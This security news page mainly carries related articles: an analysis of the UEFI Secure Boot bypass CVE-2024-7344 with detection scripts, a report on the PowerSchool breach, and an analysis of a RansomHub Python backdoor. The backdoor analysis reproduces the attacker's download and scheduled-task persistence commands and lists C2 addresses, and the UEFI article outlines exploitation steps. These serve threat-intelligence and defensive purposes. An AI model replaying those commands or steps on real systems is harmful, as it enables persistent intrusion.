
Data Leak

Pizza Hut


ShinyHunters Exposed Over One Million Pizza Hut Australia Customers' Data!

Details of Over One Million Pizza Hut Australia Customers Compromised in a Massive Data Leak; the ShinyHunters Threat Group Claimed to Be Behind It

20-Sep-2023
6 min read

No content available.

Related Articles

UEFI

A flaw exposing UEFI Secure Boot vulnerabilities. Learn how attackers exploit it...

Researchers have identified an exceptionally critical vulnerability, CVE-2024-7344, that undermines UEFI Secure Boot, a cornerstone security mechanism designed to ensure the integrity of the system boot process. The flaw enables malicious code execution during the boot sequence even when Secure Boot is active, jeopardizing the security posture of countless modern systems. The impacted systems span a broad spectrum of UEFI-based devices, significantly raising the risk of UEFI bootkit deployments such as Bootkitty or BlackLotus.

The ramifications of this discovery are profound. Secure Boot, integral to protecting the boot chain, becomes ineffective once the flaw is exploited, leading to unauthorized code execution. This raises severe security concerns across industries relying on UEFI-based devices, as attackers can compromise systems without triggering conventional security mechanisms.

### In-Depth Analysis of CVE-2024-7344

#### Vulnerability Context

The vulnerability stems from a defective UEFI application signed with Microsoft’s widely trusted Microsoft Corporation UEFI CA 2011 certificate. This allows attackers to circumvent Secure Boot by executing unsigned binaries during startup. The vulnerability affects multiple recovery software suites, including but not limited to:

- **Howyar SysReturn** (versions prior to 10.2.023_20240919)
- **Greenware GreenGuard** (versions prior to 10.2.023-20240927)
- **Radix SmartRecovery** (versions prior to 11.2.023-20240927)
- **Sanfong EZ-back System** (versions prior to 10.3.024-20241127)
- **WASAY eRecoveryRX** (versions prior to 8.4.022-20241127)
- **CES NeoImpact** (versions prior to 10.1.024-20241127)
- **SignalComputer HDD King** (versions prior to 10.3.021-20241127)

#### Root Cause and Technical Insights

The crux of the vulnerability lies in the use of a custom PE loader that bypasses the standard UEFI services `LoadImage` and `StartImage`, which are where the Secure Boot signature check normally happens. This flawed implementation allows the execution of unsigned UEFI binaries from a specifically crafted file named `cloak.dat`, rendering Secure Boot policies ineffective.

#### Exploitation Mechanism

Meticulous investigation revealed that the `cloak.dat` file, part of the vulnerable recovery software, contains an encrypted UEFI binary. Instead of relying on UEFI’s integrity checks, the custom loader decrypts and executes the binary directly. The steps to exploit this vulnerability include:

1. **Replacing the Bootloader**: Attackers substitute the system’s default bootloader with the vulnerable `reloader.efi` binary.
2. **Deploying Malicious Payloads**: A crafted `cloak.dat` file containing unsigned binaries is placed on the EFI System Partition (ESP).
3. **Executing the Payload**: Upon reboot, the malicious binary executes without adherence to Secure Boot policies.

The attack requires elevated privileges (e.g., local administrator rights on Windows or root access on Linux) but is feasible on any system that trusts Microsoft’s third-party UEFI certificate.

### UEFI Secure Boot: A Comprehensive Overview

UEFI Secure Boot ensures the integrity of the boot process by validating binaries against two key databases:

1. **db**: Lists trusted certificates and hashes authorized for execution.
2. **dbx**: Enumerates revoked certificates and hashes, explicitly forbidding their execution.

Most UEFI devices ship with Microsoft’s certificates preloaded to maintain compatibility with major operating systems. However, this reliance on Microsoft centralizes control over boot security, exposing potential systemic vulnerabilities when a binary signed under these certificates turns out to be flawed.

### Coordinated Disclosure and Remediation Timeline

The responsible disclosure process ensured swift vendor responses and mitigation measures. Key milestones include:

- **2024-07-08**: Discovery of the vulnerability by researchers.
- **2024-07-09**: Reporting to the CERT Coordination Center (CERT/CC).
- **2024-08-05**: CERT/CC engages affected vendors.
- **2024-08-20**: Initial patches reviewed; additional flaws identified.
- **2024-09-23**: Disclosure rescheduled to align with remediation timelines.
- **2025-01-14**: Vulnerable binaries revoked in Microsoft’s Patch Tuesday update.

This coordinated effort underscores the importance of collaboration between researchers, CERTs, and vendors in addressing security threats efficiently.

### Mitigation Strategies and Detection Mechanisms

#### Applying UEFI Revocations

Users are strongly advised to update their systems with the latest UEFI revocations from Microsoft. The following commands check whether the Microsoft third-party CA is present in db and whether the hash of the vulnerable binary has been added to dbx:

**Windows Systems**:

```powershell
[System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI db).bytes) -match 'Microsoft Corporation UEFI CA 2011'
[BitConverter]::ToString((Get-SecureBootUEFI dbx).bytes) -replace '-' -match 'cdb7c90d3ab8833d5324f5d8516d41fa990b9ca721fe643fffaef9057d9f9e48'
```

**Linux Systems**:

```bash
dbxtool --list | grep 'cdb7c90d3ab8833d5324f5d8516d41fa990b9ca721fe643fffaef9057d9f9e48'
```

#### Strengthening UEFI Configurations

1. **Customized Secure Boot Policies**: Tailor Secure Boot settings (for example, which certificates are enrolled in db) to restrict what may execute at boot.
2. **EFI Partition Protections**: Limit access to the EFI System Partition through managed permissions.
3. **Remote Attestation**: Leverage the TPM for remote validation of boot configurations.

### Implications and Recommendations

CVE-2024-7344 exemplifies systemic vulnerabilities in the UEFI ecosystem, driven by opaque third-party signing processes. To enhance security, stakeholders must advocate for greater transparency and stringent review protocols in UEFI application signing. Microsoft’s upcoming UEFI certificate updates provide a pivotal opportunity to address these challenges. For detailed inquiries, contact [threatintel@researchteam.com](mailto:threatintel@researchteam.com) or visit the [Threat Intelligence page](https://www.researchteam.com).
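The one-liners above grep the raw bytes of the db and dbx variables. As an added example that is not part of this article or of any vendor tooling, the Python script below parses the EFI_SIGNATURE_LIST structures those variables are made of and performs the same two checks (revoked `reloader.efi` hash in dbx, Microsoft Corporation UEFI CA 2011 in db) as exact entry lookups; the two blobs it runs on are constructed inside the script.

```python
import struct
import uuid

# Signature-type GUIDs from the UEFI specification (stored little-endian in the variable).
EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
# SHA-256 of the vulnerable reloader.efi, as quoted in the article; CA name as it appears in db.
REVOKED_HASH = "cdb7c90d3ab8833d5324f5d8516d41fa990b9ca721fe643fffaef9057d9f9e48"
MS_UEFI_CA_2011 = b"Microsoft Corporation UEFI CA 2011"

def parse_signature_lists(blob):
    """Yield (type_guid, signature_data) for every EFI_SIGNATURE_DATA in a db/dbx blob."""
    off = 0
    while off + 28 <= len(blob):
        type_guid = uuid.UUID(bytes_le=blob[off:off + 16])
        list_size, hdr_size, sig_size = struct.unpack_from("<III", blob, off + 16)
        if list_size < 28 + hdr_size or off + list_size > len(blob) or sig_size <= 16:
            raise ValueError("malformed EFI_SIGNATURE_LIST at offset %d" % off)
        pos = off + 28 + hdr_size  # skip the list header and the optional SignatureHeader
        end = off + list_size
        while pos + sig_size <= end:
            # Each entry is a 16-byte SignatureOwner GUID followed by SignatureData.
            yield type_guid, blob[pos + 16:pos + sig_size]
            pos += sig_size
        off = end

def hash_revoked(dbx, sha256_hex):
    """True if dbx contains the given SHA-256 as an EFI_CERT_SHA256 entry."""
    want = bytes.fromhex(sha256_hex)
    return any(t == EFI_CERT_SHA256_GUID and data == want
               for t, data in parse_signature_lists(dbx))

def cert_name_present(db, needle):
    """Same test as the PowerShell one-liner: is the CA name inside any X.509 entry?"""
    return any(t == EFI_CERT_X509_GUID and needle in data
               for t, data in parse_signature_lists(db))

def build_list(type_guid, entries):
    """Build one EFI_SIGNATURE_LIST; used here only to construct the sample blobs."""
    sig_size = 16 + len(entries[0])
    body = b"".join(uuid.UUID(int=0).bytes_le + e for e in entries)
    return type_guid.bytes_le + struct.pack("<III", 28 + len(body), 0, sig_size) + body

# Constructed samples: a dbx holding the revoked hash plus an unrelated all-zero hash,
# and a db whose only "certificate" is a stand-in blob that contains the CA's name.
SAMPLE_DBX = build_list(EFI_CERT_SHA256_GUID, [bytes.fromhex(REVOKED_HASH), bytes(32)])
SAMPLE_DB = build_list(EFI_CERT_X509_GUID, [b"\x30\x82" + MS_UEFI_CA_2011 + bytes(8)])

if __name__ == "__main__":
    print("revoked reloader.efi hash in dbx:", hash_revoked(SAMPLE_DBX, REVOKED_HASH))
    print("Microsoft UEFI CA 2011 in db:", cert_name_present(SAMPLE_DB, MS_UEFI_CA_2011))
```

On a real machine, pass the bytes returned by `Get-SecureBootUEFI dbx` (or, on Linux, the efivarfs file for dbx with its leading 4-byte attribute word removed) to `hash_revoked`; a revoked system returns `True` for the quoted hash.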

18-Jan-2025
4 min read

Extortion

Explore the PowerSchool data breach affecting millions of students and teachers....

The education technology sector suffered a major setback when PowerSchool, a leading provider of school records software, was hit by a cyberattack that compromised the personal data of millions of students and teachers. The breach, which occurred in December, has raised concerns about data security and privacy within K-12 school systems across the United States, both because of its vast scale and because of the historical depth of the compromised data. Unlike many cyberattacks, this incident affected records spanning more than a decade, exposing systemic weaknesses in how educational data is stored and protected. With PowerSchool’s software supporting over 60 million students, educational institutions are left grappling with the fallout.

### Scale of the Breach

Sources within affected school districts confirmed that the attackers accessed vast troves of sensitive information, including historical data on students and teachers. For some districts this data reportedly dates back to the 2009-2010 school year. Compromised data includes names, addresses, Social Security numbers, some medical information, grade data, and other personally identifiable information (PII). A school district representative disclosed, “In our case, the attackers gained access to all historical student and teacher data. This breach extends far beyond current records, affecting anyone whose information has ever been stored in the PowerSchool system.” Logs from some districts show that unauthorized access began even earlier than PowerSchool’s official timeline of late December.

### Insufficient Security Measures

One major concern highlighted by this incident is the lack of basic cybersecurity controls. According to affected districts, the compromised PowerSchool system lacked multi-factor authentication (MFA), a critical layer of defense against credential-based attacks. Without MFA, stolen credentials can be used directly, as there is no additional barrier such as a verification code or biometric check to stop an unauthorized login. This lapse likely facilitated the breach, allowing the attackers to get in and extract data with minimal resistance. PowerSchool spokesperson Beth Keebler confirmed that the company employs MFA in its operations but declined to elaborate on its implementation or on which systems it protects. Experts argue that the absence of robust controls on systems handling such sensitive information points to a systemic weakness in the education technology sector. Mark Racine, CEO of RootED Solutions, emphasized in a blog post that this breach affects not only current PowerSchool customers but also former customers, significantly expanding the number of impacted individuals.

### Affected Districts and Data Exposure

Several districts have publicly confirmed the breach’s impact on their data. The Menlo Park City School District in California reported unauthorized access to the personal details of all current students and staff, as well as historical records dating back more than a decade. The Rancho Santa Fe School District revealed that teachers’ login credentials for the PowerSchool system were also compromised, potentially disrupting ongoing educational processes. Other districts are reporting affected student counts four to ten times higher than their current enrollment, further highlighting the magnitude of the breach. PowerSchool’s FAQ for customers indicated that while the type of stored data varies by district and state requirements, the breach included significant PII. Despite this, Keebler stated that the company’s ongoing review suggests most affected customers did not have Social Security numbers or medical information exfiltrated.

### PowerSchool’s Response

PowerSchool claims to have taken “appropriate steps” to prevent the dissemination of the stolen data, asserting that the compromised information has been deleted without further replication. However, the company has not disclosed the specific measures taken or provided evidence to support its claim. Experts suggest that robust encryption, regular security audits, and advanced access controls such as MFA could have minimized the risk of such a breach, and that clear communication about the measures taken, with evidence supporting the deletion claims, would bolster trust among stakeholders. Without such transparency, questions about the effectiveness of PowerSchool’s response are likely to persist. “While our data review remains ongoing, we have identified the schools and districts whose data was involved and are working to notify impacted individuals,” said Keebler in a statement. PowerSchool declined to publicly share the names of affected districts, adding to frustrations over transparency.

### Larger Implications

The breach raises critical questions about the security of sensitive data in educational systems. Legislative changes, such as mandating comprehensive data encryption standards and requiring multi-factor authentication across all edtech platforms, could significantly reduce exposure. Stricter data retention policies and regular compliance audits for educational institutions would further address these concerns. With more districts relying on technology to manage records, the need for stringent cybersecurity measures has never been greater. Experts advocate for mandatory adoption of practices such as MFA, encryption, and regular security audits to protect data. Moreover, this incident highlights the risk of retaining extensive historical data without robust safeguards. School districts must reassess their data retention policies and invest in secure infrastructure to prevent similar breaches in the future.

17-Jan-2025
5 min read

Ransomhub

Backdoor

Python-based backdoor used by RansomHub ransomware, exploiting network flaws wit...

An alarming incident reported in Q4 2024 revealed evidence of a sophisticated threat actor using a Python-based backdoor to maintain persistent access to compromised endpoints. That access was then used to deploy RansomHub encryptors across the impacted network. Earlier, in February 2024, [ReliaQuest documented a prior version of this malware](https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/), highlighting the continuous evolution of this malicious tool.

### Key Features of the Latest Python Backdoor

GuidePoint’s investigation revealed critical updates in the latest variant of the Python-based backdoor, setting it apart from its predecessors. Key distinctions include:

- **Obfuscation Techniques**: Used [PyObfuscate[.]com](https://blog.sucuri.net/2024/06/socgholish-malware.html) for code obfuscation to evade detection.
- **Deployment Method**: Exploited Remote Desktop Protocol (RDP) for lateral movement.
- **Unique Indicators of Compromise (IoC)**: Introduced distinct filenames, scheduled task names, and command-and-control (C2) addresses.

Collaboration with cybersecurity experts, including @drb_ra, resulted in the publication of 18 C2 IP addresses on GitHub in the repository “[drb-ra/C2IntelFeeds](https://github.com/drb-ra/C2IntelFeeds).”

### The Deployment Process

The malware deployment followed a systematic and precise methodology:

1. **Initial Access**: [SocGholish (FakeUpdate)](https://mediatrust.com/blog/socgholish-driveby-download-compromised-landing-page/) was identified as the initial access vector.
2. **Python Backdoor Deployment**: Dropped on the initially compromised system 20 minutes post-infection.
3. **Lateral Movement**: Additional systems were infected via RDP.

The five-step process for installing Python and deploying the backdoor included:

1. Navigating to the target directory: `C:\users\<redacted>\appdata\local\connecteddevicesplatform`
2. Installing Python:

   ```powershell
   wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile .\python3.12.zip
   ```

3. Setting up pip and the required libraries:

   ```powershell
   wget https://bootstrap.pypa.io/pip/pip.pyz -OutFile .\pip.pyz; .\pythonw.exe pip.pyz --trusted-host files.pythonhosted.org --trusted-host pypi.org install pycryptodome virtualenv requests pipx --upgrade pip --no-warn-script-location;
   ```

4. Creating a Python proxy script: `get-pip2.pyd`
5. Establishing persistence with a scheduled task:

   ```powershell
   $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\<redacted>\AppData\Local\ConnectedDevicesPlatform\get-pip' -Execute 'pythonw.exe' -Argument 'get-pip2.pyd';
   $t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1);
   $s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;
   Register-ScheduledTask -TaskName 'get-pip2' -Action $a -Trigger $t -Settings $s -User 'system'
   ```

### Technical Analysis of the Python Script

#### Functionality

The backdoor functions as a reverse proxy, creating a SOCKS5-like tunnel to enable lateral movement. Key operations include:

1. Establishing an initial TCP connection to a hardcoded IP address.
2. Using the received data to create a secondary connection.
3. Acting as a proxy for threat actor communication.

#### Obfuscation and AI-Generated Code

The script employs advanced obfuscation techniques and demonstrates unusually high coding standards. Observations include:

- **Polished Code**: Suggestive of meticulous programming or AI-assisted code generation.
- **Structured Design**: Uses classes, descriptive method names, and robust error handling.
- **Hardcoded Configuration**: IPs and ports are hardcoded, so the script runs without any external configuration.

#### C2 Behavior

The backdoor’s C2 communications involve:

1. Creating a TCP socket and idling until specific bytes are received.
2. Opening a secondary TCP connection based on the received data.
3. Establishing a SOCKS5-like tunnel for proxied traffic.

### Evidence of Advanced Persistence

The malware’s persistence strategy involves:

- Regular execution via scheduled tasks.
- Frequent updates to evade detection.
- Obfuscated builds that attract minimal VirusTotal detection.

Notably, [VirusTotal’s report on the malware](https://www.virustotal.com/gui/file/64d8f12cdcd1dfa7a3c012a36c011a43303dc8357b7899db254a022b187cba03) showed zero detections at the time of upload.

### Indicators of Compromise (IoC)

Key IoCs include:

- **Filename**: `get-pip2.pyd`
- **Task Name**: `get-pip2`
- **SHA256 Hash**: `5089fd6ce6d8c0fca8d9c4af7441ee9198088bfba6e200e27fe30d3bc0c6401c`
- **C2 IPs**: Examples include `185.174.101.240`, `38.180.81.153`, and `104.238.61.144` (full list available on GitHub).

### Key Takeaways

- RansomHub affiliates are leveraging Python-based backdoors for persistence and evasion.
- The adoption of AI in malware development is an emerging trend.
- Continuous monitoring and collaboration are essential to counter these threats.

[Halcyon’s detailed threat insights](https://www.halcyon.ai/blog/halcyon-threat-insights-012-january-2025-ransomware-report) provide further context on this evolution.
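The scheduled-task registration above leaves a task definition on disk that a defender can audit. As an added example that is not from GuidePoint’s report, the Python script below scores a Task Scheduler XML definition against the traits described in this article (a Python interpreter launching a `.pyd`-named script from a user AppData path, repeating every minute, as SYSTEM); the task XML it checks is constructed here from the article’s command, not taken from a real host.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_SUFFIXES = (".py", ".pyw", ".pyd")
APPDATA_LOCAL = re.compile(r"\\AppData\\Local\\", re.IGNORECASE)

# Constructed sample mirroring the Register-ScheduledTask command in the article:
# pythonw.exe running a ".pyd"-named script from AppData, every minute, as SYSTEM.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT1M</Interval></Repetition>
    <StartBoundary>2024-10-01T09:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><ExecutionTimeLimit>PT0S</ExecutionTimeLimit></Settings>
  <Actions Context="Author"><Exec><Command>pythonw.exe</Command><Arguments>get-pip2.pyd</Arguments>
    <WorkingDirectory>C:\\Users\\alice\\AppData\\Local\\ConnectedDevicesPlatform\\get-pip</WorkingDirectory></Exec></Actions>
</Task>"""


def iso_minutes(interval):
    """Convert a Task Scheduler ISO-8601 duration (PT1M, PT1H30M, P1D) to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", interval or "")
    if not m:
        return float("inf")
    d, h, mi, s = (int(x or 0) for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def analyse_task(xml_text):
    """Return the indicators a task definition matches (empty list = nothing notable)."""
    root = ET.fromstring(xml_text)
    hits = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", "", NS).lower()
        args = ex.findtext("t:Arguments", "", NS).lower()
        workdir = ex.findtext("t:WorkingDirectory", "", NS)
        if cmd.endswith(("python.exe", "pythonw.exe")) and args.endswith(SCRIPT_SUFFIXES):
            hits.append("python interpreter launching a script from a scheduled task")
        if args.endswith(".pyd"):
            hits.append("script disguised with a .pyd (extension module) suffix")
        if APPDATA_LOCAL.search(workdir) or APPDATA_LOCAL.search(cmd):
            hits.append("runs from a user AppData\\Local directory")
    for interval in root.findall(".//t:Triggers//t:Repetition/t:Interval", NS):
        if iso_minutes(interval.text) <= 5:
            hits.append("repeats every %s (beacon-style persistence)" % interval.text)
    user = root.findtext(".//t:Principals/t:Principal/t:UserId", "", NS)
    if user.upper() in ("S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"):
        hits.append("runs as SYSTEM")
    return hits


if __name__ == "__main__":
    for hit in analyse_task(SAMPLE_TASK_XML):
        print("[!]", hit)
```

On a live Windows host the same XML comes from `Export-ScheduledTask` or the files under `C:\Windows\System32\Tasks`, so the function can be run over every registered task rather than the one sample.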

16-Jan-2025
4 min read